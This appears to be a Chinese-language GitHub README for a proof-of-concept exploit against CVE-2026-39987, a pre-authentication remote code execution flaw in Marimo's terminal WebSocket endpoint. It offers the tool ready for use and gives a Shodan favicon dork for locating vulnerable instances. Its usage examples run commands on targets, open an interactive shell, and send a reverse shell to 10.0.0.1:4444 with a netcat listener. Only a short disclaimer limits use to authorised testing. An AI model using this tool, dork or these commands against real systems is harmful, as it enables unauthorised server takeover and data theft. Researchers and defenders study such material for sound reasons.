M3PH1569/CVE-2026-39987-POC

GitHub: M3PH1569/CVE-2026-39987-POC

CVE-2026-39987 的概念验证利用工具，可对 Marimo <0.23.0 进行预认证远程代码执行。

Stars: 1 | Forks: 0

# CVE-2026-39987 - Marimo < 0.23.0 预认证远程代码执行（WebSocket） ![CVSS](https://img.shields.io/badge/CVSS-9.3-red) ![严重性](https://img.shields.io/badge/严重性-紧急-red) ![Python](https://img.shields.io/badge/Python-3.14+-blue.svg) ![许可证](https://img.shields.io/badge/许可证-MIT-green.svg) 这是一个针对 **Marimo 0.23.0 以下版本** 中严重预认证远程代码执行（RCE）漏洞的概念验证（PoC）利用程序。该漏洞允许未经身份验证的攻击者连接到 WebSocket 端点（`/terminal/ws`），并在目标服务器上执行任意系统命令。 ## 功能 - **自动化验证**：通过识别版本并验证 Marimo 应用程序的存在（通过 favicon 和 `/api/version` 端点），自动检查目标是否存在漏洞。 - **单命令执行**：向目标发送单条命令并接收输出。 - **交互式 Shell**：生成一个伪交互式持久 shell，无缝与目标交互。 - **反向 Shell 生成**：内置支持生成并执行反向 shell 载荷。 - **验证绕过**：使用 `--no-check` 标志可绕过版本和存在性检查，适用于端点可能被隐藏的环境。 ## Shodan / FOFA Dork 您可以使用以下 dork 来识别潜在易受攻击的实例： ``` http.favicon.hash:-1864630356 ``` ## 安装说明建议使用 Python 虚拟环境来安装依赖项。 ``` # 1. 克隆 repository git clone https://github.com/M3PH1569/CVE-2026-39987-POC.git cd CVE-2026-39987-POC # 2. 创建并激活 virtual environment python -m venv .CVE-2026-39987 # Windows .CVE-2026-39987\Scripts\activate # Linux/macOS source .CVE-2026-39987/bin/activate # 3. 安装所需的 dependencies pip install -r requirements.txt ``` ## 使用方法 ``` usage: CVE-2026-39987.py [-h] [-i] [--revshell IP PORT] [--no-check] target [command] CVE-2026-39987 - Marimo Pre-Auth RCE POC positional arguments: target URL of the target (e.g., http://localhost:8080) command Command to execute (optional if using -i) options: -h, --help show this help message and exit -i, --interactive Interactive mode (persistent shell) --revshell IP PORT Generate reverse shell payload (IP and port) --no-check Skip vulnerability verification ``` ### 示例 **1. 执行单条命令：** ``` python CVE-2026-39987.py http://target.com:8080 "id" ``` **2. 启动交互式 Shell：** ``` python CVE-2026-39987.py http://target.com:8080 -i ``` **3. 执行反向 Shell：** 请确保您的机器上已运行一个 netcat 监听器（例如 `nc -lvnp 4444`）。 ``` python CVE-2026-39987.py http://target.com:8080 --revshell 10.0.0.1 4444 ``` **4. 跳过验证检查并强制执行：** ``` python CVE-2026-39987.py http://target.com:8080 "whoami" --no-check ``` ## 免责声明此工具严格用于 **教育目的和授权的道德黑客行为**。作者不对因使用此脚本而导致的任何滥用、损害或非法活动负责。**在执行任何安全测试之前，请始终确保获得系统所有者的明确许可**。未经授权使用此脚本是违法的，将受到法律制裁。 ## 许可证本项目采用 MIT 许可证授权 – 详情请参阅 [LICENSE](LICENSE) 文件。 ---

由 M3PH1569 用 ☕︎ 制作

标签：CISA项目, CVE-2026-39987, Marimo, Python, WebSocket, 交互式Shell, 依赖分析, 利用工具, 反向Shell, 命令执行, 威胁模拟, 无后门, 未认证漏洞, 终端漏洞, 编程工具, 网络安全, 自动化验证, 远程代码执行, 逆向工具, 隐私保护, 预认证RCE